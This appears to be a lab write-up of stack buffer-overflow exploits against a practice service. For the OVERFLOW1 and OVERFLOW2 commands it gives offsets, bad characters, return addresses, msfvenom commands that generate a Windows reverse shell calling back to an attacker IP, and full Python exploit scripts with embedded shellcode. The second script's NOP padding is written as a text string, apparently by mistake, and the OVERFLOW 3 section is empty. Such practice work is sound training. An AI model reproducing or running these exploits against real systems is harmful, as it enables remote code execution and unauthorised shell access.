

Overflow 1 Exploit
===================

Offset: 1978

Badchars: "\x00\x07\x2e\xa0"

Payload command: msfvenom -p windows/shell_reverse_tcp -f py -b "\x00\x07\x2e\xa0" EXITFUNC=thread LHOST=10.2.26.221 LPORT=1234

Chosen Return address: "\xAF\x11\x50\x62"

Exploit Code
--------------

#!/usr/bin/python

import socket

ip = "10.10.85.159"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "\xAF\x11\x50\x62"
padding = "\x90" * 16

buf =  b""
buf += b"\xd9\xc2\xbe\xa2\x91\x10\x95\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x83\xea\xfc\x31\x72\x13\x03\xd0\x82\xf2"
buf += b"\x60\xe8\x4d\x70\x8a\x10\x8e\x15\x02\xf5\xbf\x15\x70"
buf += b"\x7e\xef\xa5\xf2\xd2\x1c\x4d\x56\xc6\x97\x23\x7f\xe9"
buf += b"\x10\x89\x59\xc4\xa1\xa2\x9a\x47\x22\xb9\xce\xa7\x1b"
buf += b"\x72\x03\xa6\x5c\x6f\xee\xfa\x35\xfb\x5d\xea\x32\xb1"
buf += b"\x5d\x81\x09\x57\xe6\x76\xd9\x56\xc7\x29\x51\x01\xc7"
buf += b"\xc8\xb6\x39\x4e\xd2\xdb\x04\x18\x69\x2f\xf2\x9b\xbb"
buf += b"\x61\xfb\x30\x82\x4d\x0e\x48\xc3\x6a\xf1\x3f\x3d\x89"
buf += b"\x8c\x47\xfa\xf3\x4a\xcd\x18\x53\x18\x75\xc4\x65\xcd"
buf += b"\xe0\x8f\x6a\xba\x67\xd7\x6e\x3d\xab\x6c\x8a\xb6\x4a"
buf += b"\xa2\x1a\x8c\x68\x66\x46\x56\x10\x3f\x22\x39\x2d\x5f"
buf += b"\x8d\xe6\x8b\x14\x20\xf2\xa1\x77\x2d\x37\x88\x87\xad"
buf += b"\x5f\x9b\xf4\x9f\xc0\x37\x92\x93\x89\x91\x65\xd3\xa3"
buf += b"\x66\xf9\x2a\x4c\x97\xd0\xe8\x18\xc7\x4a\xd8\x20\x8c"
buf += b"\x8a\xe5\xf4\x03\xda\x49\xa7\xe3\x8a\x29\x17\x8c\xc0"
buf += b"\xa5\x48\xac\xeb\x6f\xe1\x47\x16\xf8\x04\x9a\x02\x25"
buf += b"\x70\x98\x32\xd1\x53\x15\xd4\xb3\x43\x70\x4f\x2c\xfd"
buf += b"\xd9\x1b\xcd\x02\xf4\x66\xcd\x89\xfb\x97\x80\x79\x71"
buf += b"\x8b\x75\x8a\xcc\xf1\xd0\x95\xfa\x9d\xbf\x04\x61\x5d"
buf += b"\xc9\x34\x3e\x0a\x9e\x8b\x37\xde\x32\xb5\xe1\xfc\xce"
buf += b"\x23\xc9\x44\x15\x90\xd4\x45\xd8\xac\xf2\x55\x24\x2c"
buf += b"\xbf\x01\xf8\x7b\x69\xff\xbe\xd5\xdb\xa9\x68\x89\xb5"
buf += b"\x3d\xec\xe1\x05\x3b\xf1\x2f\xf0\xa3\x40\x86\x45\xdc"
buf += b"\x6d\x4e\x42\xa5\x93\xee\xad\x7c\x10\x0e\x4c\x54\x6d"
buf += b"\xa7\xc9\x3d\xcc\xaa\xe9\xe8\x13\xd3\x69\x18\xec\x20"
buf += b"\x71\x69\xe9\x6d\x35\x82\x83\xfe\xd0\xa4\x30\xfe\xf0"

payload = buf
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

OVERFLOW 2
============

Offset: 634

Badchars: "\x00\x23\x3c\x83\xba"

Payload command: msfvenom -p windows/shell_reverse_tcp -f py -b "\x00\x23\x3c\x83\xba" EXITFUNC=thread LHOST=10.2.26.221 LPORT=1234

Chosen Return address: "\xBB\x11\x50\x62"

Final Exploit Code
===================

#!/usr/bin/python

import socket

ip = "10.10.85.159"
port = 1337

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "\xBB\x11\x50\x62"
padding = "0x90" * 16
buf =  b""
buf += b"\xfc\xbb\x97\xd7\x3f\xa3\xeb\x0c\x5e\x56\x31\x1e\xad"
buf += b"\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x6b"
buf += b"\x3f\xbd\xa3\x93\xc0\xa2\x2a\x76\xf1\xe2\x49\xf3\xa2"
buf += b"\xd2\x1a\x51\x4f\x98\x4f\x41\xc4\xec\x47\x66\x6d\x5a"
buf += b"\xbe\x49\x6e\xf7\x82\xc8\xec\x0a\xd7\x2a\xcc\xc4\x2a"
buf += b"\x2b\x09\x38\xc6\x79\xc2\x36\x75\x6d\x67\x02\x46\x06"
buf += b"\x3b\x82\xce\xfb\x8c\xa5\xff\xaa\x87\xff\xdf\x4d\x4b"
buf += b"\x74\x56\x55\x88\xb1\x20\xee\x7a\x4d\xb3\x26\xb3\xae"
buf += b"\x18\x07\x7b\x5d\x60\x40\xbc\xbe\x17\xb8\xbe\x43\x20"
buf += b"\x7f\xbc\x9f\xa5\x9b\x66\x6b\x1d\x47\x96\xb8\xf8\x0c"
buf += b"\x94\x75\x8e\x4a\xb9\x88\x43\xe1\xc5\x01\x62\x25\x4c"
buf += b"\x51\x41\xe1\x14\x01\xe8\xb0\xf0\xe4\x15\xa2\x5a\x58"
buf += b"\xb0\xa9\x77\x8d\xc9\xf0\x1f\x62\xe0\x0a\xe0\xec\x73"
buf += b"\x79\xd2\xb3\x2f\x15\x5e\x3b\xf6\xe2\xa1\x16\x4e\x7c"
buf += b"\x5c\x99\xaf\x55\x9b\xcd\xff\xcd\x0a\x6e\x94\x0d\xb2"
buf += b"\xbb\x3b\x5d\x1c\x14\xfc\x0d\xdc\xc4\x94\x47\xd3\x3b"
buf += b"\x84\x68\x39\x54\x2f\x93\xaa\x51\xb2\x81\xf7\x0e\xb0"
buf += b"\xb5\x03\x1d\x3d\x53\x61\xb1\x68\xcc\x1e\x28\x31\x86"
buf += b"\xbf\xb5\xef\xe3\x80\x3e\x1c\x14\x4e\xb7\x69\x06\x27"
buf += b"\x37\x24\x74\xee\x48\x92\x10\x6c\xda\x79\xe0\xfb\xc7"
buf += b"\xd5\xb7\xac\x36\x2c\x5d\x41\x60\x86\x43\x98\xf4\xe1"
buf += b"\xc7\x47\xc5\xec\xc6\x0a\x71\xcb\xd8\xd2\x7a\x57\x8c"
buf += b"\x8a\x2c\x01\x7a\x6d\x87\xe3\xd4\x27\x74\xaa\xb0\xbe"
buf += b"\xb6\x6d\xc6\xbe\x92\x1b\x26\x0e\x4b\x5a\x59\xbf\x1b"
buf += b"\x6a\x22\xdd\xbb\x95\xf9\x65\xdb\x77\x2b\x90\x74\x2e"
buf += b"\xbe\x19\x19\xd1\x15\x5d\x24\x52\x9f\x1e\xd3\x4a\xea"
buf += b"\x1b\x9f\xcc\x07\x56\xb0\xb8\x27\xc5\xb1\xe8\x27\xe9"
buf += b"\x4d\x13"

payload = buf 
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

OVERFLOW 3
============

